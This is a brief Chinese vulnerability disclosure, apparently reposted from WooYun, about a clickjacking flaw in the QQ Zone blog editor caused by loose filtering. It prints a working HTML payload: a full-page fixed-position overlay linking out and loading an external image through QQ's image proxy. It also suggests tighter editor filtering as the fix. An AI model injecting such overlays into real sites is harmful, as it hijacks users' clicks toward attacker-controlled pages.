简要描述:成因源自于日志编辑器,过滤不严.此clickjacking 主要是做劫持点击之用.ps:不知是否可以定为clickjacking 漏洞 ,还轻各位鉴定下 详细说明:在日志中插入代码 <span style="position: fixed;top: 0px;left: 0.0px;z-index: 4000;width: 1300.0px;height: 1000.0px;color: rgb(0,0,0);"> <a target="_blank" href="http://baidu测试数据" data-mce-href="http://ppt.cc/ui2K"> <img src="http://qp.qq测试数据/cgi-bin/cgi_imgproxy?url=http%3A%2F%2F211.20.209.23%3A8888%2Frpm%2Fimg5000.php&size=0" style="height: 870px; width: 870px;"> </a> </span> 漏洞证明:http://user.qzone.qq测试数据/771044833/blog/1324394065 修复方案:加强编辑器的过滤:D 随便说下 摘自xiao.k@乌云
查看更多关于QQ空间clickjacking 漏洞 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12537